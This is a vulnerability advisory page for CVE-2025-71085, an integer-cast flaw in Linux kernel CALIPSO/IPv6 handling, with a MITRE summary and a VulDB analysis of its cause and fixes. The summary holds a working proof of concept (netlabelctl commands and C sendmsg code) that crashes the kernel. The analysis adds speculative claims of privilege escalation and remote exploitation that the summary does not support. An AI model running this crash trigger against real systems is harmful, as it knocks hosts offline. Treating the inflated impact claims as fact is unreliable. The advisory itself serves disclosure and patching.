CVE-2025-71085 in Linux
Summary
by MITRE • 01/13/2026
In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom.
PoC: Using `netlabelctl` tool:
netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7
Then run the following PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
// setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0;
// setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337;
// setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80
sendmsg(fd, &msg, 0);
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 03/31/2026
The vulnerability CVE-2025-71085 represents a critical kernel-level issue within the Linux networking stack, specifically affecting the IPv6 implementation and CALIPSO (Common Architecture for Labeling Internet Protocol) processing routines. This flaw manifests as a kernel oops triggered by a BUG_ON assertion failure in the pskb_expand_head() function, which is part of the calipso_skbuff_setattr() routine. The root cause stems from an integer overflow condition that occurs when handling excessive headroom values during socket buffer manipulation. The vulnerability is particularly concerning as it can lead to system crashes and potential denial of service conditions, making it a significant threat to system stability and availability in networked environments.
The technical mechanism behind this vulnerability involves a specific integer casting issue within the __skb_cow() function where an implicit conversion allows negative headroom values to be passed to subsequent processing functions. The condition (headroom > skb_headroom(skb)) is designed to prevent negative delta calculations, but when headroom values exceed INT_MAX, the arithmetic overflow causes delta to become negative while still passing the initial validation check. This results in pskb_expand_head() receiving a negative value for nhead parameter, which triggers the BUG_ON(nhead < 0) assertion at net/core/skbuff.c:2232. The vulnerability specifically impacts the CALIPSO protocol handling within the IPv6 stack, where the kernel attempts to manipulate socket buffer attributes for security labeling purposes.
The operational impact of CVE-2025-71085 extends beyond simple system crashes, as it represents a potential vector for privilege escalation and system instability in environments where CALIPSO policies are actively configured and used. Attackers can exploit this vulnerability through crafted IPv6 packets containing specially constructed CALIPSO options that trigger the problematic code path during packet processing. The use of the netlabelctl tool in the provided proof-of-concept demonstrates how legitimate system administration commands can be leveraged to establish the necessary conditions for exploitation. This vulnerability affects systems running Linux kernels that support CALIPSO functionality and have IPv6 networking enabled, making it particularly relevant for enterprise network infrastructure, firewalls, and security appliances that utilize advanced labeling protocols.
Mitigation strategies for CVE-2025-71085 focus on both immediate defensive measures and long-term architectural improvements. The primary fix involves modifying the trigger condition in calipso_skbuff_setattr() to prevent passing negative headroom sizes to skb_cow() by implementing proper bounds checking and avoiding headroom reduction operations. System administrators should ensure their kernel versions are updated with the patched implementation that addresses the integer overflow condition in the __skb_cow() function. Additionally, network administrators should review and restrict CALIPSO policy configurations, particularly in environments where external network traffic is processed, as this vulnerability is specifically triggered through IPv6 packet processing with CALIPSO headers. The fix aligns with security best practices outlined in CWE-191 (Integer Underflow) and addresses ATT&CK techniques related to privilege escalation and system stability compromise through kernel-level vulnerabilities. Organizations should also implement network monitoring to detect unusual patterns of IPv6 traffic that might indicate exploitation attempts, and maintain updated security patches to prevent similar integer overflow conditions in other kernel subsystems.